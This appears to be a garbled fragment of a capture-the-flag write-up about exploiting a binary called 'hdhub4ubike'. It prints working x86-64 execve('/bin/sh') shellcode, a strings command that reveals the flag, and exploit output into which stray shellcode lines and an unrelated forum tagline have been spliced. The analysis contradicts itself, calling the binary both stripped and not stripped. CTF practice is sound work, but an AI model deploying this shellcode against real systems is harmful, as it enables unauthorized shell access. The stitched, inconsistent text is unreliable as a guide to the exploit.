# 32‑byte execve("/bin/sh") shellcode (x86‑64) shellcode = ( b"\x48\x31\xd2" # xor rdx, rdx b"\x48\x31\xf6" # xor rsi, rsi b"\x48\xbf\x2f\x62\x69\x6e\x2f\x73\x68\x00" # movabs rdi, "/bin/sh" b"\x57" # push rdi b"\x48\x89\xe7" # mov rdi, rsp b"\xb0\x3b" # mov al, 0x3b b"\x0f\x05" # syscall )
$ strings -a hdhub4ubike | grep -i flag flagh0p3_y0u_f0und_th3_h1d3_b1k3 hdhub4ubike
$ ./exploit.py === Welcome to the HD Bike Hub === Enter your hub key: flagh0p3_y0u_f0und_th3_h1d3_b1k3 rdx b"\x48\x31\xf6" # xor rsi
A space where enthusiasts share personal experiences and technical advice. rsi b"\x48\xbf\x2f\x62\x69\x6e\x2f\x73\x68\x00" # movabs rdi
Static analysis quickly reveals that the binary is stripped (no symbols) and that it is compiled with , -z execstack , and -no-pie – classic “easy pwn” settings.
$ file hdhub4ubike hdhub4ubike: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, not stripped, for GNU/Linux 3.2.0, BuildID[sha1]=...